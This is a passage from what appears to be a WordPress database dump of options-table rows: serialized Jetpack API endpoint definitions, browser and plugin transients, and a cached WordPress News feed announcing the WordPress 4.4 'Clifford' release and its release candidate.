ath\";s:24:\"/sites/%s/categories/new\";s:11:\"min_version\";s:1:\"0\";s:11:\"max_version\";s:3:\"1.1\";s:15:\"request_methods\";a:1:{i:0;s:4:\"POST\";}}i:8;a:4:{s:4:\"path\";s:18:\"/sites/%s/tags/new\";s:11:\"min_version\";s:1:\"0\";s:11:\"max_version\";s:3:\"1.1\";s:15:\"request_methods\";a:1:{i:0;s:4:\"POST\";}}i:9;a:4:{s:4:\"path\";s:29:\"/sites/%s/sharing-buttons/new\";s:11:\"min_version\";s:1:\"0\";s:11:\"max_version\";s:3:\"1.1\";s:15:\"request_methods\";a:1:{i:0;s:4:\"POST\";}}i:10;a:4:{s:4:\"path\";s:19:\"/sites/%s/menus/new\";s:11:\"min_version\";s:1:\"0\";s:11:\"max_version\";s:3:\"1.1\";s:15:\"request_methods\";a:1:{i:0;s:4:\"POST\";}}}s:7:\"restore\";a:2:{i:0;a:4:{s:4:\"path\";s:26:\"/sites/%s/posts/%d/restore\";s:11:\"min_version\";s:1:\"0\";s:11:\"max_version\";s:1:\"1\";s:15:\"request_methods\";a:1:{i:0;s:4:\"POST\";}}i:1;a:4:{s:4:\"path\";s:26:\"/sites/%s/posts/%d/restore\";s:11:\"min_version\";s:3:\"1.1\";s:11:\"max_version\";s:3:\"1.1\";s:15:\"request_methods\";a:1:{i:0;s:4:\"POST\";}}}s:8:\"autosave\";a:1:{i:0;a:4:{s:4:\"path\";s:27:\"/sites/%s/posts/%d/autosave\";s:11:\"min_version\";s:3:\"1.1\";s:11:\"max_version\";s:3:\"1.1\";s:15:\"request_methods\";a:2:{i:0;s:3:\"GET\";i:1;s:4:\"POST\";}}}s:5:\"media\";a:2:{i:0;a:4:{s:4:\"path\";s:16:\"/sites/%s/media/\";s:11:\"min_version\";s:1:\"0\";s:11:\"max_version\";s:1:\"1\";s:15:\"request_methods\";a:1:{i:0;s:3:\"GET\";}}i:1;a:4:{s:4:\"path\";s:16:\"/sites/%s/media/\";s:11:\"min_version\";s:3:\"1.1\";s:11:\"max_version\";s:3:\"1.1\";s:15:\"request_methods\";a:1:{i:0;s:3:\"GET\";}}}s:8:\"comments\";a:1:{i:0;a:4:{s:4:\"path\";s:19:\"/sites/%s/comments/\";s:11:\"min_version\";s:1:\"0\";s:11:\"max_version\";s:3:\"1.1\";s:15:\"request_methods\";a:1:{i:0;s:3:\"GET\";}}}s:7:\"replies\";a:1:{i:0;a:4:{s:4:\"path\";s:27:\"/sites/%s/posts/%d/replies/\";s:11:\"min_version\";s:1:\"0\";s:11:\"max_version\";s:3:\"1.1\";s:15:\"request_methods\";a:1:{i:0;s:3:\"GET\";}}}s:10:\"categories\";a:1:{i:0;a:4:{s:4:\"path\";s:20:\"/sites/%s/categories\";s:11:\"min_version\";s:1:\"0\";s:11:\"max_version\";s:3:\"1.1\";s:15:\"request_methods\";a:1:{i:0;s:3:\"GET\";}}}s:4:\"tags\";a:1:{i:0;a:4:{s:4:\"path\";s:14:\"/sites/%s/tags\";s:11:\"min_version\";s:1:\"0\";s:11:\"max_version\";s:3:\"1.1\";s:15:\"request_methods\";a:1:{i:0;s:3:\"GET\";}}}s:5:\"roles\";a:1:{i:0;a:4:{s:4:\"path\";s:15:\"/sites/%s/roles\";s:11:\"min_version\";s:1:\"0\";s:11:\"max_version\";s:3:\"1.1\";s:15:\"request_methods\";a:1:{i:0;s:3:\"GET\";}}}s:5:\"users\";a:1:{i:0;a:4:{s:4:\"path\";s:15:\"/sites/%s/users\";s:11:\"min_version\";s:1:\"0\";s:11:\"max_version\";s:3:\"1.1\";s:15:\"request_methods\";a:1:{i:0;s:3:\"GET\";}}}s:8:\"login:%s\";a:1:{i:0;a:4:{s:4:\"path\";s:24:\"/sites/%s/users/login:%s\";s:11:\"min_version\";s:1:\"0\";s:11:\"max_version\";s:3:\"1.1\";s:15:\"request_methods\";a:1:{i:0;s:3:\"GET\";}}}s:7:\"invites\";a:1:{i:0;a:4:{s:4:\"path\";s:17:\"/sites/%s/invites\";s:11:\"min_version\";s:1:\"0\";s:11:\"max_version\";s:3:\"1.1\";s:15:\"request_methods\";a:1:{i:0;s:3:\"GET\";}}}s:8:\"settings\";a:1:{i:0;a:4:{s:4:\"path\";s:18:\"/sites/%s/settings\";s:11:\"min_version\";s:1:\"0\";s:11:\"max_version\";s:3:\"1.1\";s:15:\"request_methods\";a:2:{i:0;s:3:\"GET\";i:1;s:4:\"POST\";}}}s:11:\"connections\";a:1:{i:0;a:4:{s:4:\"path\";s:22:\"/sites/%s/connections/\";s:11:\"min_version\";s:1:\"0\";s:11:\"max_version\";s:3:\"1.1\";s:15:\"request_methods\";a:1:{i:0;s:3:\"GET\";}}}s:15:\"sharing-buttons\";a:2:{i:0;a:4:{s:4:\"path\";s:26:\"/sites/%s/sharing-buttons/\";s:11:\"min_version\";s:1:\"0\";s:11:\"max_version\";s:3:\"1.1\";s:15:\"request_methods\";a:1:{i:0;s:3:\"GET\";}}i:1;a:4:{s:4:\"path\";s:25:\"/sites/%s/sharing-buttons\";s:11:\"min_version\";s:1:\"0\";s:11:\"max_version\";s:3:\"1.1\";s:15:\"request_methods\";a:1:{i:0;s:4:\"POST\";}}}s:9:\"customcss\";a:1:{i:0;a:4:{s:4:\"path\";s:19:\"/sites/%s/customcss\";s:11:\"min_version\";s:3:\"1.1\";s:11:\"max_version\";s:3:\"1.1\";s:15:\"request_methods\";a:2:{i:0;s:3:\"GET\";i:1;s:4:\"POST\";}}}s:5:\"menus\";a:1:{i:0;a:4:{s:4:\"path\";s:15:\"/sites/%s/menus\";s:11:\"min_version\";s:1:\"0\";s:11:\"max_version\";s:3:\"1.1\";s:15:\"request_methods\";a:1:{i:0;s:3:\"GET\";}}}}','no'),(14012,'_site_transient_timeout_browser_5b8d9ba1790c5201ad4cd9fd6f8aba9e','1450376853','yes'),(14013,'_site_transient_browser_5b8d9ba1790c5201ad4cd9fd6f8aba9e','a:9:{s:8:\"platform\";s:4:\"iPad\";s:4:\"name\";s:4:\"iPad\";s:7:\"version\";s:3:\"9.0\";s:10:\"update_url\";s:0:\"\";s:7:\"img_src\";s:0:\"\";s:11:\"img_src_ssl\";s:0:\"\";s:15:\"current_version\";s:0:\"\";s:7:\"upgrade\";b:0;s:8:\"insecure\";b:0;}','yes'),(14970,'_site_transient_timeout_browser_f78c7e340d72eb1bd7643317460df670','1450626348','yes'),(14971,'_site_transient_browser_f78c7e340d72eb1bd7643317460df670','a:9:{s:8:\"platform\";s:7:\"Windows\";s:4:\"name\";s:6:\"Chrome\";s:7:\"version\";s:12:\"47.0.2526.73\";s:10:\"update_url\";s:28:\"http://www.google.com/chrome\";s:7:\"img_src\";s:49:\"http://s.wordpress.org/images/browsers/chrome.png\";s:11:\"img_src_ssl\";s:48:\"https://wordpress.org/images/browsers/chrome.png\";s:15:\"current_version\";s:2:\"18\";s:7:\"upgrade\";b:0;s:8:\"insecure\";b:0;}','yes'),(14997,'_transient_timeout_tablepress_c_a87ff679a2f3e71d9181a67b7542122c','1451497005','no'),(14998,'_transient_tablepress_c_a87ff679a2f3e71d9181a67b7542122c','[\"tablepress_cc16fc95c9993d2623b0efc60e7c1eff\"]','no'),(15001,'_transient_timeout_tablepress_c_c81e728d9d4c2f636f067f89cc14862c','1451552156','no'),(15002,'_transient_tablepress_c_c81e728d9d4c2f636f067f89cc14862c','[\"tablepress_96089c1146ab9922098c175f55bee839\"]','no'),(15468,'_site_transient_timeout_browser_84531b92f49e0892cdd11e7ba1d41ac6','1450770144','yes'),(15469,'_site_transient_browser_84531b92f49e0892cdd11e7ba1d41ac6','a:9:{s:8:\"platform\";s:7:\"Windows\";s:4:\"name\";s:6:\"Chrome\";s:7:\"version\";s:12:\"47.0.2526.80\";s:10:\"update_url\";s:28:\"http://www.google.com/chrome\";s:7:\"img_src\";s:49:\"http://s.wordpress.org/images/browsers/chrome.png\";s:11:\"img_src_ssl\";s:48:\"https://wordpress.org/images/browsers/chrome.png\";s:15:\"current_version\";s:2:\"18\";s:7:\"upgrade\";b:0;s:8:\"insecure\";b:0;}','yes'),(15482,'_transient_timeout_plugin_slugs','1450251752','no'),(15483,'_transient_plugin_slugs','a:11:{i:0;s:29:\"advanced-ads/advanced-ads.php\";i:1;s:42:\"advanced-ads-responsive/responsive-ads.php\";i:2;s:29:\"antispam-bee/antispam_bee.php\";i:3;s:35:\"cookie-law-info/cookie-law-info.php\";i:4;s:9:\"hello.php\";i:5;s:19:\"jetpack/jetpack.php\";i:6;s:30:\"multi-author-adsense/index.php\";i:7;s:34:\"phpsword-favicon-manager/index.php\";i:8;s:31:\"smooth-slider/smooth-slider.php\";i:9;s:25:\"tablepress/tablepress.php\";i:10;s:47:\"wp-security-audit-log/wp-security-audit-log.php\";}','no'),(15648,'_transient_timeout_feed_ac0b00fe65abe10e0c5b588f3ed8c7ca','1450259642','no'),(15649,'_transient_feed_ac0b00fe65abe10e0c5b588f3ed8c7ca','a:4:{s:5:\"child\";a:1:{s:0:\"\";a:1:{s:3:\"rss\";a:1:{i:0;a:6:{s:4:\"data\";s:3:\"\n\n\n\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:7:\"version\";s:3:\"2.0\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:1:{s:0:\"\";a:1:{s:7:\"channel\";a:1:{i:0;a:6:{s:4:\"data\";s:49:\"\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:3:{s:0:\"\";a:7:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"WordPress News\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:26:\"https://wordpress.org/news\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"WordPress News\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:13:\"lastBuildDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 09 Dec 2015 14:54:21 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"language\";a:1:{i:0;a:5:{s:4:\"data\";s:5:\"en-US\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:9:\"generator\";a:1:{i:0;a:5:{s:4:\"data\";s:40:\"https://wordpress.org/?v=4.5-alpha-35949\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"item\";a:10:{i:0;a:6:{s:4:\"data\";s:36:\"\n \n \n \n \n \n \n\n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:3:{s:0:\"\";a:6:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"WordPress 4.4 “Clifford”\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:44:\"https://wordpress.org/news/2015/12/clifford/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 08 Dec 2015 03:25:47 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:2:{i:0;a:5:{s:4:\"data\";s:8:\"Releases\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:3:\"4.4\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:34:\"https://wordpress.org/news/?p=3990\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:379:\"Version 4.4 of WordPress, named “Clifford” in honor of jazz trumpeter Clifford Brown, is available for download or update in your WordPress dashboard. New features in 4.4 make your site more connected and responsive. Clifford also introduces a new default theme, Twenty Sixteen. Introducing Twenty Sixteen Our newest default theme, Twenty Sixteen, is a modern take […]\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Matt Mullenweg\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:39245:\"

                                                                Version 4.4 of WordPress, named “Clifford” in honor of jazz trumpeter Clifford Brown, is available for download or update in your WordPress dashboard. New features in 4.4 make your site more connected and responsive. Clifford also introduces a new default theme, Twenty Sixteen.

                                                                \n

                                                                \n
                                                                \n

                                                                Introducing Twenty Sixteen

                                                                \n

                                                                \"A

                                                                \n

                                                                Our newest default theme, Twenty Sixteen, is a modern take on a classic blog design.

                                                                \n

                                                                Twenty Sixteen was built to look great on any device. A fluid grid design, flexible header, fun color schemes, and more, will all make your content shine.

                                                                \n
                                                                \n

                                                                Responsive Images

                                                                \n

                                                                \"An

                                                                \n

                                                                WordPress now takes a smarter approach to displaying appropriate image sizes on any device, ensuring a perfect fit every time. You don’t need to do anything to your theme, it just works.

                                                                \n
                                                                \n

                                                                Embed Everything

                                                                \n\n

                                                                Now you can embed your posts on other WordPress sites. Simply drop a post URL into the editor and see an instant embed preview, complete with the title, excerpt, and featured image if you’ve set one. We’ll even include your site icon and links for comments and sharing.

                                                                \n

                                                                In addition to post embeds, WordPress 4.4 also adds support for five new oEmbed providers: Cloudup, Reddit Comments, ReverbNation, Speaker Deck, and VideoPress.

                                                                \n
                                                                \n

                                                                Under the Hood

                                                                \n

                                                                \"The

                                                                \n

                                                                REST API infrastructure

                                                                \n

                                                                Infrastructure for the REST API has been integrated into core, marking a new era in developing with WordPress. The REST API gives developers an easy way to build and extend RESTful APIs on top of WordPress.

                                                                \n

                                                                Infrastructure is the first part of a multi-stage rollout for the REST API. Inclusion of core endpoints is targeted for an upcoming release. To get a sneak peek of the core endpoints, and for more information on extending the REST API, check out the official WordPress REST API plugin.

                                                                \n

                                                                Term meta

                                                                \n

                                                                Terms now support metadata, just like posts. See add_term_meta(), get_term_meta(), and update_term_meta() for more information.

                                                                \n

                                                                Comment query improvements

                                                                \n

                                                                Comment queries now have cache handling to improve performance. New arguments in WP_Comment_Query make crafting robust comment queries simpler.

                                                                \n
                                                                \n
                                                                \n

                                                                Term, comment, and network objects

                                                                \n

                                                                New WP_Term, WP_Comment, and WP_Network objects make interacting with terms, comments, and networks more predictable and intuitive in code.

                                                                \n
                                                                \n
                                                                \n
                                                                \n

                                                                The Team

                                                                \n

                                                                \"ScottThis release was led by Scott Taylor, with the help of these fine individuals. There are 471 contributors with props in this release (by far the most ever!). Pull up some Clifford Brown on your music service of choice, and check out some of their profiles:

                                                                \n@mercime, _smartik_, A5hleyRich, Aaron D. Campbell, Aaron Jorbin, Aaron Rutley, Adam Harley (Kawauso), Adam Silverstein, adamholisky, aduth, Ahmad Awais, Aki Bjorklund, AlbertoCT, Alex Kirk, Alex Mills (Viper007Bond), Alex Shiels, Alexander Gounder, alireza1375, Amanda Giles, amereservant, Amy Hendrix (sabreuse), Andrea Fercia, Andrew Nacin, Andrew Norcross, Andrew Ozz, Andy Fragen, Angelo Mandato, Ankit Gade, Ankit K Gupta, Anthony Burchell, ap.koponen, apokalyptik, Athsear\'J.S., atomicjack, Austin Ginder, Austin Matzko, Barry Ceelen, Barry Kooij, bcworkz, BdN3504, Bego Mario Garde, Ben May, Benjamin Pick, Bernhard Riedl, bigdawggi, bilalcoder, BinaryKitten, Birgir Erlendsson (birgire), Bjorn Johansen, bobbingwide, bonger, Boone B. Gorges, Brad Touesnard, bradparbs, Brady Vercher, Brandon Kraft, bravokeyl, brentvr, brettz95, Bruno Kos, Cam, Cami Kaos, carolinegeven, Casey Bisson, Catalin Dogaru, ch1902, chacha102, Chandra M, Chase Wiseman, Chiara Dossena, Chip Bennett, Chirag Swadia, Chris Christoff, Chris Kindred, Chris Klosowski, chriscoyier, Chrisdc1, christianoliff, Christoph Herr, Christopher Finke, cjhaas, codeelite, Coen Jacobs, Compute, Courtney Ivey, Craig Ralston, Curtiss Grymala, Daisuke Takahashi, Dan Boulet, Daniel Bachhuber, Daniel Koskinen, Daniel Menard, Daniele Scasciafratte, daniellandau, daniloercoli, Danny de Haan, Darren Ethier (nerrad), Daryl L. L. Houston (dllh), Datta Parad, Dave McHale, David A. Kennedy, David Anderson, David Herrera, David Shanske, david.binda, DeBAAT, Denis de Bernardy, Dennis Ploetner, Derek Herman, Devin Price, Dezzy, Dion Hulse, Dipali Dhole, dipesh.kakadiya, Dominik Bruderer, Dominik Schilling, Dreb Bits, Drew Jaynes, dustinbolton, Dzikri Aziz, edirect24, Eduardo Reveles, Eduardo Zulian, Edward Caissie, Egill R. Erlendsson, egower, Ehsaan, ehtis, Ella Iseulde Van Dorpe, Ellie Strejlau, Elliott Stocks, elusiveunit, enshrined, Eric Andrew Lewis, Eric Binnion, Eric Daams, Eric Mann, ericjuden, Evan Herman, F4rkie, Felix Arntz, Firdaus Zahari, fonglh, francoisb, Frank Klein, Frankie Jarrett, Fredrik Forsmo, Gaelan Lloyd, Gagan Deep Singh, Gary Cao, Gary Jones, Gary Pendergast, garza, Gaurav Pareek, Gautam Gupta, geminorum, Gerhard Potgieter, geza.miklo, Gijs Jorissen, Giuseppe Mamone, Giustino Borzacchiello, gnaka08, gradyetc, Greg Rickaby, Gregory Karpinsky (@tivnet), Gustavo Bordoni, Gustavo Bordoni, gwinh.lopez, hakre, hauvong, Helen Hou-Sandí, Hinaloe, Hrishikesh Vaipurkar, Hugh Lashbrooke, Hugo Baeta, Iain Poulson, Ian Dunn, Ian Stewart, icetee, Ignacio Cruz Moreno, Ihor Vorotnov, imath, ippetkov, J.D. Grimes, jakub.tyrcha, James Huff, janhenckens, Japh, Jasper de Groot, jazbek, jcroucher, Jeff Farthing, Jeff Stieler, JeffMatson, Jeffrey de Wit, jeichorn, Jeremy Felt, Jeremy Pry, Jeroen Schmit, Jesin A, Jesper van Engelen, jim912, jliman, jmayhak, jnylen0, Jobst Schmalenbach, Joe Dolson, Joe Hoyle, Joe McGill, joehills, John Blackbourn, John James Jacoby, John P. Bloch, John Parris, Jon Cave, Jonathan Bardo, Jonathan Desrosiers, Joost de Valk, Jorge Bernal, Josh Betz, Josh Eaton, Josh Pollock, jrf, Juhi Saxena, Julio Potier, justdaiv, Justin Sainton, Justin Shreve, Justin Sternberg, Justin Tadlock, K.Adam White, Kailey (trepmal), KalenJohnson, karinedo, karpstrucking, Kelly Dwan, Kevin Behrens, Kevin Langley, kevinatelement, kitchin, Kite, Konstantin Kovshenin, Konstantin Obenland, kraftner, Krzysiek Drozdz, Kurt Payne, laceous, Lance Willett, Laurens Offereins, lcherpit, ldinclaux, Lee Willis, leemon, lessbloat, linuxologos, Lucas Karpiuk, lucatume, luciole135, Lucy Tomas, Luke Carbis, madalin.ungureanu, Mako, manolis09, Marcin Pietrzak, Marin Atanasov, Mario Peshev, Marius (Clorith), Mark Jaquith, Marko Heijnen, Markus, Mat Marquis, Matheus Martins, Matt Bagwell, Matt Gibbs, Matt Martz, Matt Mullenweg, Matt van Andel, Matthew Boynes, Matthew Haines-Young, mazurstas, mbrandys, mdmcginn, mehulkaklotar, Mel Choyce, meloniq, micahmills, micahwave, Michael Adams (mdawaffe), Michael Arestad, Michael Cain, Michiel Habraken, Mickey Kay, Mike Glendinning, Mike Hansen, Mike Jolley, Mike Jordan, Mike Schinkel, Mike Schroder, Milan Dinic, mismith227, misterunknown, mitcho (Michael Yoshitaka Erlewine), Monika, Morgan Estes, Morten Rand-Hendriksen, moto hachi ( mt8.biz ), Mr Papa, mrmist, mulvane, neoscrib, NExT-Season, Niall Kennedy, nicholas_io, Nick Ciske, Nick Halsey, NickDuncan, Nicolas Juen, nikeo, Nikhil Chavan, Niklas, Nikola Nikolov, Nikolay Bachiyski, Nilambar Sharma, OriginalEXE, Paresh Radadiya, Pascal Birchler, Pat O\'Brien, Paul Bearne, Paul de Wouters, Paul Ryan, Paul Wilde, pavelevap, Payton Swick, Peter Wilson, Petter Walbo Johnsgard, Petya Raykovska, pfefferle, Philip Arthur Moore, PhilipLakin, Philipp Cordes, Piotr Delawski, Piotr Soluch, Pippin Williamson, Prasad Nevase, Prasath Nadarajah, Pratik, Rachel Baker, rajnikmit, Rakesh Lawaju (Racase Lawaju), ramay, Rami Yushuvaev, Raul Illana, renoirb, rhubbardreverb, Rhys Wynne, Rian Rietveld, Richard Tape, Robert Chapin, Rodrigo Primo, Rommel Castro, Ron Rennick, Ronald Huereca, Russell Heimlich, Ruud Laan, Ryan Kienstra, Ryan Markel, Ryan McCue, Ryan Welcher, Safirul Alredha, Sal Ferrarello, Sam Brodie, sam2kb, Samir Shah, Samuel Sidler, Samuel Wood (Otto), Sanket Parmar, Sara Rosso, sarciszewski, Scott Grant, Scott Kingsley Clark, Scott Reilly, ScreenfeedFr, scribu, Sean Davis, Sean Hayes, Sebastian Pisula, Sergey Biryukov, serpent7776, several27, shimakyohsuke, side777, Simon Prosser, Simon Wheatley, Siobhan, sirzooro, sjmur, smerriman, Spacedmonkey, Stanislav Khromov, Stanko Metodiev, stebbiv, Stefan Froehlich, Stephane Boisvert, Stephanie Leary, Stephen Edgar, Stephen Harris, Steve Grunwell, stevehenty, SteveHoneyNZ, Steven Word, Store Locator Plus, Sudar Muthu, Sujay, Sumit Singh, summerblue, Sunny Ratilal, Takashi Irie, Takayuki Miyauchi, Tammie Lister, Tanner Moushey, tbcorr, Terry Chay, tharsheblows, theMikeD, thomaswm, Thorsten Frommen, Thorsten Ott, tigertech, Till Kruss, Tim Evko, tmatsuur, tmeister, TobiasBg, Tom Willmot, TomHarrigan, tommarshall, tomsommer, Toni Viemero, Toro_Unit (Hiroshi Urabe), Tracy (LilJimmi) Levesque, Tran Ngoc Tuan Anh, Travis Smith, trenzterra, Tryon Eggleston, tszming, ty, Ty Carlson, Ulrich, Ulrich Sossou, Umesh Kumar, Umesh Nevase, Utkarsh, vilkatis, voldemortensen, Walter Ebert, walterbarcelos, webdevmattcrom, WEN Solutions, WEN Themes, Weston Ruter, wmertens, Wojtek Szkutnik, WP Plugin Dev dot com, wpdev101, wpseek, wturrell, Yam Chhetri, Yoav Farhi, Zach Wills, Zack Rothauser, and Zack Tollman.\n

                                                                 

                                                                \n

                                                                Special thanks go to Siobhan McKeown for producing the release video with Sara Rosso, and Cami Kaos for the voice-over.

                                                                \n

                                                                Finally, thanks to all of the contributors who provided subtitles for the release video, which at last count had been translated into 23 languages!

                                                                \n

                                                                If you want to follow along or help out, check out Make WordPress and our core development blog. Thanks for choosing WordPress. See you soon for version 4.5!

                                                                \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:1;a:6:{s:4:\"data\";s:39:\"\n \n \n \n \n \n \n \n\n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:3:{s:0:\"\";a:6:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"WordPress 4.4 Release Candidate\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:67:\"https://wordpress.org/news/2015/11/wordpress-4-4-release-candidate/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 25 Nov 2015 23:04:05 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:3:{i:0;a:5:{s:4:\"data\";s:11:\"Development\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:8:\"Releases\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:2;a:5:{s:4:\"data\";s:3:\"4.4\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:34:\"https://wordpress.org/news/?p=3982\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:328:\"The release candidate for WordPress 4.4 is now available. RC means we think we’re done, but with millions of users and thousands of plugins and themes, it’s possible we’ve missed something. We hope to ship WordPress 4.4 on Tuesday, December 8, but we need your help to get there. If you haven’t tested 4.4 yet, […]\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:12:\"Scott Taylor\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:1801:\"

                                                                The release candidate for WordPress 4.4 is now available.

                                                                \n

                                                                RC means we think we’re done, but with millions of users and thousands of plugins and themes, it’s possible we’ve missed something. We hope to ship WordPress 4.4 on Tuesday, December 8, but we need your help to get there.

                                                                \n

                                                                If you haven’t tested 4.4 yet, now is the time!

                                                                \n

                                                                Think you’ve found a bug? Please post to the Alpha/Beta support forum. If any known issues come up, you’ll be able to find them here.

                                                                \n

                                                                To test WordPress 4.4 RC1, you can use the WordPress Beta Tester plugin or you can download the release candidate here (zip).

                                                                \n

                                                                For more information about what’s new in version 4.4, check out the Beta blog post.

                                                                \n

                                                                Developers, please test your plugins and themes against WordPress 4.4 and update your plugin’s Tested up to version in the readme to 4.4 before next week. If you find compatibility problems, we never want to break things, so please be sure to post to the support forums so we can figure those out before the final release.

                                                                \n

                                                                Be sure to follow along the core development blog, where we’ll continue to post notes for developers for 4.4.

                                                                \n

                                                                Tickets are all closed
                                                                \nHelp test the latest changes
                                                                \nNew WordPress for All

